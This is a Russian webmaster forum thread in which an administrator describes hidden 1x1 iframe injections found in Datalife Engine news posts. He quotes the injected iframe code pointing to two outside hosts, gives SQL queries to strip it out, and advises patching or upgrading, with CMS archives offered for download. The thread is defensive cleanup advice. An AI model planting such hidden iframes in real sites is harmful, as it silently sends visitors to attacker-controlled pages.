Уязвимости и взломы в Datalife Engine

Веб-мастера управляют сайтами и знают все тонкости этой сферы. Вебмастера профессионально или в качестве хобби занимаются разработкой или обслуживанием веб-сайтов. Этот форум для вебмастеров. [0.30]

Уязвимости и взломы в Datalife Engine

Сообщение Lavr » 17 дек 2010, 05:12

Полезная темка будет думаю для многих, кто пользуется этой CMS. Начну с первой проблемы из-за которой пришлось поломать голову. Многие обладатели версий 8.3 - 8.5 имеют шанс получить вот такой код в новостях:
Код: Выделить всё
[center]<iframe src="http://tyt-vse.ucoz.ru/index/0-2" width="1" height="1"></iframe>[/center]

Штука могу заметить не приятная. :nea: Подвержены больше всего те, кто не заклеивает дырки в движке.
Рекомендуемое лечение:
1) Закрыть все известные дыры (на офф сайте есть инфа)
2) Обновить движок до 9.0 версии в ней этой дырки нет.
Вот кстати и сам ДЛЕ
datalife-engine_9.0.rar
Это не Null версия с закрытыми на сегодняшний день известными дырами
(2.71 МБ) Скачиваний: 579

Проверка сайта на код:
Лично я заметил по счётчику LI. Вкладка > переходы на сайты. В ней видите все сайты на которые попадали с вашего. Если неизвестный вам сайт имеет большое количество переходов значит вами пользуются.
Удаление кода из новостей:
1) В ручную редактировать каждую новость и удалять коды.
2) Ввести запрос в базе
Код: Выделить всё
UPDATE `dle_post` SET `full_story` = REPLACE(`full_story`, '<div align="center"><iframe src="http://tyt-vse.ucoz.ru/index/0-2" width="1" height="1"></iframe></div>', '');

Лично я ввёл и вся эта гадость потёрлась. Надеюсь нигде ничего лишнего не удалило. Вот и всё.
Изображение
Аватара пользователя
Lavr
Администратор
Администратор
 
Сообщения: 489
Зарегистрирован: 30 мар 2010, 05:57
Наличности на руках: 8.65
Банк: 32.20
Откуда: Планета Сентау
Возраст: 36
Пол: Мужской

Re: Уязвимости и взломы в Datalife Engine

Сообщение Lavr » 13 янв 2011, 02:35

Думаю уже не для кого не секрет о том, что Celsoft сделал под НГ подарок и выпустил DataLife Engine 9.2

Полезные разделы в админпанели скрипта, новые возможности онлайн редактора шаблонов, автоматическое уведомление большинства поисковых систем о новой карте сайта, несколько новых ББ тегов, и многое другое, но больше всего нам интересны исправленные обнаруженные и заявленные ранее небольшие ошибки в скрипте.
Будем надеяться, что багов в этой версии будет меньше чем новинок. :)

Собственно вот чистая версия -
cms-datalife-engine_9.2.rar
Это не Null, а значит действует ограничение от разработчика
(3.55 МБ) Скачиваний: 593

Приятного пользования.
P.S. - Сам пока не обновился, так как буквально перед НГ перевёл сайты на 9.0 и честно говоря лень опять всё настраивать.

Добавлено спустя 16 часов 7 минут 5 секунд:
Был обнаружен ещё код iframe, который вставляли.
Код: Выделить всё
<iframe src="http://diz777vik.narod2.ru/1/" width="1" height="1"></iframe>

Для удаления нужно провести такие действия:
1) В ручную редактировать каждую новость и удалять коды.
или
2) Ввести запрос в базе
Код: Выделить всё
UPDATE `dle_post` SET `full_story` = REPLACE(`full_story`, '<div align="center"><iframe src="http://diz777vik.narod2.ru/1/" width="1" height="1"></iframe></div>', '');
Изображение
Аватара пользователя
Lavr
Администратор
Администратор
 
Сообщения: 489
Зарегистрирован: 30 мар 2010, 05:57
Наличности на руках: 8.65
Банк: 32.20
Откуда: Планета Сентау
Возраст: 36
Пол: Мужской


Вернуться в Форум вебмастеров

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей